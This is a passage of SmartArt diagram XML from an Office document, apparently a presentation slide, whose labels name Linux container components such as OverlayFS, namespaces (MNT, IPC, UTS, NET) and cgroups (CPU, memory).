    <dgm:cxn modelId="{50739795-7278-487E-9F06-01BDF5B5E4B2}" type="presParOf" srcId="{BDB489C2-AB41-495E-B2D1-24579A6FCFC1}" destId="{E1E0C623-0471-415F-B290-194C00372F81}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{64510A80-9209-4EBB-A889-30EF8FE3C2BC}" type="presParOf" srcId="{E1E0C623-0471-415F-B290-194C00372F81}" destId="{12D643E0-AF48-4183-BB35-81B6A0C9602C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{E1033A46-592F-4F5D-8066-1E7D9E5F3D1B}" type="presParOf" srcId="{E1E0C623-0471-415F-B290-194C00372F81}" destId="{5D9E89F8-0476-40AA-B726-89F90EA1EE51}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{28EA22A4-DDC1-4C9C-9409-C7FA0F2AAF47}" type="presParOf" srcId="{E1E0C623-0471-415F-B290-194C00372F81}" destId="{B22F2000-CB74-453E-B358-5701BFC71E06}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F87AA2E2-243D-4997-B668-00E6498CB49A}" type="presParOf" srcId="{E1E0C623-0471-415F-B290-194C00372F81}" destId="{A91538A2-C9D2-43A7-83AD-664ECBE124F3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{2E8C8199-6C43-4D0C-BCAF-DEADCEB0C61F}" type="presParOf" srcId="{E1E0C623-0471-415F-B290-194C00372F81}" destId="{842C65AE-1601-4DFE-91A4-DE6A3AA19EB9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{32EA2606-2B8E-4A03-9F56-3C636BFB4FA2}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{1642BF6E-B815-49CA-9D8D-A3EDC0FA3181}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{75F88BF1-E6EF-42AF-BE7C-177BA82C940D}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{24F39EA9-872B-4793-A06E-B269342C502A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{846C09DB-048F-4187-8440-CF23DA6558EC}" type="presParOf" srcId="{24F39EA9-872B-4793-A06E-B269342C502A}" destId="{FBB82117-9837-4D37-BC7F-DB3F82D556BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{1B6A9356-A43E-4313-8E6C-301A0EE644B6}" type="presParOf" srcId="{24F39EA9-872B-4793-A06E-B269342C502A}" destId="{2912360F-2CE9-41DD-84E2-A113FA90909C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{1B240C2A-55ED-49A7-8B74-6CD9A74BBAC0}" type="presParOf" srcId="{24F39EA9-872B-4793-A06E-B269342C502A}" destId="{217AA398-71F8-4B52-A94D-F9B649FB41A0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F032EB69-AFC1-40BD-A9E1-8ADC95984C5E}" type="presParOf" srcId="{217AA398-71F8-4B52-A94D-F9B649FB41A0}" destId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D49AFD9D-9494-41F0-83A0-AD6349F3E74F}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{7072083A-8581-4329-9DA0-477B82581EDE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{472C450A-07A3-4593-9724-501358BFEC8B}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{EDBCD22F-3FDD-4D77-B533-DE9FA35276C6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{FE42CD31-79AE-468F-B0A7-4E31EC51C2D4}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{16C8F441-0E86-4BA4-8205-623AF8A01764}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{174A6196-FC17-48BF-99D8-5AD55E119A45}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{E87DB7A6-E225-4EC0-8FB8-1087809CBFA2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{13B67B74-7936-44C5-AA83-AB56B224699B}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{D9DE7586-6054-4E01-82D6-6CA481C824AF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{D5EB34B7-F10F-4227-A409-6E5055F38B23}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{4BAC1984-F7DB-448A-9A0E-122747079244}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{89C9C42F-F54C-4EF2-A552-D6616A755545}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{4EEEF414-5E73-42B1-80EC-B52F54E5145E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{80855E0D-8C8F-4088-A5C3-296ACD45239C}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{D52C5E6E-E7C1-4988-B938-98D7B6AFD8A1}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{2394BC73-4027-4EE2-A328-DAB86839E501}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{4A8EAC8B-62AB-4CCE-8A50-0E3B8EC18EA9}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{1D9FB626-8CF3-41A7-B912-8649C247622F}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{0B0F154E-5D84-40E0-814D-2D5CCAAE98CE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A38E181C-CC89-481C-BECA-1CAE94A0F47E}" type="presParOf" srcId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" destId="{DCE4E765-3C65-4E4E-AB52-2A237FE0C3AC}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{4D6DC58B-C1F1-4ED2-87F0-91DEF55F5094}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{5652E85C-FE3E-406F-821C-3E2BB419D688}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{5A88A0CD-4288-43CB-9750-BD0F27A0BAF2}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{89FF70DB-3245-4090-9DD7-140609F183D5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{35A5F51D-A493-4C19-B81A-519823692A63}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{2AE096B0-E6DB-4467-AFE8-90C18B3946CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{65FA70B6-9168-463E-8DC8-817538A29A2D}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{CD020586-959D-4655-A68D-1FCA2B8A2C2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{5F7B037F-3D33-4E2E-AC2B-86C49FE2D6B3}" type="presParOf" srcId="{89FF70DB-3245-4090-9DD7-140609F183D5}" destId="{FD1E57F3-2AF9-4C0A-8DD3-29E7D85AFC55}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{ADD4A2BE-D162-4EE4-ABEF-8A575334491C}" type="presParOf" srcId="{FD1E57F3-2AF9-4C0A-8DD3-29E7D85AFC55}" destId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{DF5CEFD5-13AB-4B52-AFE8-786F5566DF1D}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{EAF9D065-4A1A-487B-8034-89DC20147E9F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{FDAB1395-406E-4A16-BEC6-BFC5956E096C}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{A77496CE-3FAA-4E9F-AC35-C52715DD80A1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{50CB2B6A-F924-4EA2-9F9F-B23CFD93FA7D}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{DE26DBA6-60A8-4CCA-85C8-D71573485800}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A9E035E8-0862-477A-BAB5-D8DACD53D867}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{91BB4A79-DF33-4DD4-9818-43EE4F124C81}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A2FBE207-4A2F-4A2F-AB4B-22ADF6F1C908}" type="presParOf" srcId="{FA551D66-BFBC-4E7A-8508-9F3BF1123165}" destId="{DDE998AB-26DA-4751-B5BE-A52201553888}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{6FEED32C-DF8B-481C-946C-167FC15BE218}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{7F44D063-1EBE-4862-97A1-C6DA5FA57AA5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A6BC2D05-0C07-4DD5-9265-ADFFA2D8BBDB}" type="presParOf" srcId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" destId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{95FA1AF9-7135-470F-ACFE-7B15ABD95E90}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{37E71803-FCFC-45CD-881A-0B6ABB3D09EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{6317BD48-23B0-46F8-A203-A6D7AC792A27}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{AB3DB6A9-26BD-4CAF-A28E-042915C55B6C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{CF52AE40-B9BA-4FC1-B9E2-564C2D0FC1F5}" type="presParOf" srcId="{2BE3E27E-A504-4384-91DB-AFCE6161E041}" destId="{5E3A8333-E7A6-4746-884F-A8C381521693}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{3BAA3BE3-D4A9-4D67-91EF-17E9F849BF2F}" type="presParOf" srcId="{5E3A8333-E7A6-4746-884F-A8C381521693}" destId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{9C22F46F-7046-4883-932E-E5DEC00474AA}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{E0E40906-6643-4F9A-933A-C9F50702F6A6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{F9F3C766-A874-478B-8000-3F19BC612AC3}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{3F6DF056-54C9-4B5B-B872-2FEEFAB793C6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{473AFA36-6C26-47D3-97FF-CA949046C59A}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{A9132D05-4FA0-424A-AF25-E417BE74898D}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{83AB004C-355B-45B1-889D-98882BA2BD2D}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{6E8AD59F-7B04-4D10-97DA-872371E7EF95}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{8C09F144-1317-47D3-BFE7-36AB3787A912}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{A9BD8B9E-F3BD-41E8-9989-9E3EAD575A42}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{BA9A5867-A4C3-4EB6-A486-319C3BAB5E40}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{B03C7BCC-0B46-4833-863C-73FA4C5C54D5}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{7623B50D-4CFD-46C6-9D53-EF134A023F73}" type="presParOf" srcId="{A7DD6ED3-3824-4579-A400-5EDE623B665E}" destId="{6B803797-6FD1-4CE6-9C71-3D6893295E52}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>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BF6E7A-4AF7-4A54-84D4-3CEEF8EA9E5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42C962FC-1D78-43BA-B0CF-137A2840F445}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>OverlayFS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1713A20B-7E8A-41DF-8180-D2A2606C61EC}" type="parTrans" cxnId="{0BEAB32E-2CE4-4B1A-931E-51A76AB16B10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7A9DD56-0BC7-44D7-8F3A-5F6C16C178A4}" type="sibTrans" cxnId="{0BEAB32E-2CE4-4B1A-931E-51A76AB16B10}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A71EB0B-D69A-44D8-97C1-8BAE0C986272}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Device Manager</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F864029A-1FCC-448F-84E4-5C83EE958893}" type="parTrans" cxnId="{2BE2B8EE-C2C3-40FF-A6E8-FDCAD669242B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EAF8B62-CA36-4231-AF1F-CD553875BE63}" type="sibTrans" cxnId="{2BE2B8EE-C2C3-40FF-A6E8-FDCAD669242B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3308BB54-327E-48E4-AFA3-CC75936853A2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Namespaces</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39F06928-C39B-497C-A11E-9FF8F73C2515}" type="parTrans" cxnId="{44B469D1-063B-4717-91A4-95F7931A4F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{989459BE-540A-4B15-AA0A-8E720923CF57}" type="sibTrans" cxnId="{44B469D1-063B-4717-91A4-95F7931A4F4D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>MNT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7E2FADA-2CE4-4D70-A8E8-2841A6A15F23}" type="parTrans" cxnId="{BCCC3E87-E7BA-4977-A59C-97BC894B6383}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E87A7702-8011-47CE-A2C4-52B8816527E9}" type="sibTrans" cxnId="{BCCC3E87-E7BA-4977-A59C-97BC894B6383}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{412D7CC0-54DC-4557-A272-C9C7C4ED6A42}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>CGROUPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFB69568-FB60-416B-9C49-F8DDD021FC00}" type="parTrans" cxnId="{9DDD98BC-68F0-49F0-8514-796C2FD74996}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D292456B-5A1C-474E-ABF1-888BF1BEDB06}" type="sibTrans" cxnId="{9DDD98BC-68F0-49F0-8514-796C2FD74996}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37B428CA-8910-41D5-84E0-19ADAFD89D7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE829FA0-E8BC-45E1-840B-8D150B001777}" type="parTrans" cxnId="{2028A836-84AB-4A8C-89B1-58BB6EF2F73D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78757145-514B-4499-ADCC-DB6F09CCD799}" type="sibTrans" cxnId="{2028A836-84AB-4A8C-89B1-58BB6EF2F73D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{879232AE-EBB8-4D24-A29B-DAB7F76442BC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32B66B13-4D90-495D-9A86-13E866F49510}" type="parTrans" cxnId="{4620290C-72F4-4622-84B0-017D3EEDFE6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{900DD4D4-5608-424E-ABC9-2EA8E030A734}" type="sibTrans" cxnId="{4620290C-72F4-4622-84B0-017D3EEDFE6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABA39408-5CF8-44FF-A5EE-E3B86003C438}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>IPC</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B36A20ED-36D2-4454-BA55-1407E12AE4F3}" type="parTrans" cxnId="{D07AE95E-CA25-4A8E-8286-4C5A65D2034A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DBC2333-CBAD-49B8-92E8-287D13ECAA5E}" type="sibTrans" cxnId="{D07AE95E-CA25-4A8E-8286-4C5A65D2034A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AD760EE-BC2F-4251-9A86-BC65A6891C47}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>UTS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{965B92D5-4333-4D12-9D9A-D5651D0AAD6A}" type="parTrans" cxnId="{82C5AC47-8BE8-4B27-9861-B2A597B5A81B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46F30D45-807B-4319-8B4F-DE7D07E4BD60}" type="sibTrans" cxnId="{82C5AC47-8BE8-4B27-9861-B2A597B5A81B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{535AD3BE-3F4B-4348-A006-6732B1DA278A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>NET</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AE6856-D43F-4CD6-A7F3-065F6BE94857}" type="parTrans" cxnId="{2F38B66A-F4E1-4A8F-97F3-D066A21DCEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E259BF91-2ABB-47A3-9F2E-201930BF661D}" type="sibTrans" cxnId="{2F38B66A-F4E1-4A8F-97F3-D066A21DCEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E0F7C7D-5750-42D3-A222-8AB979E3895A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
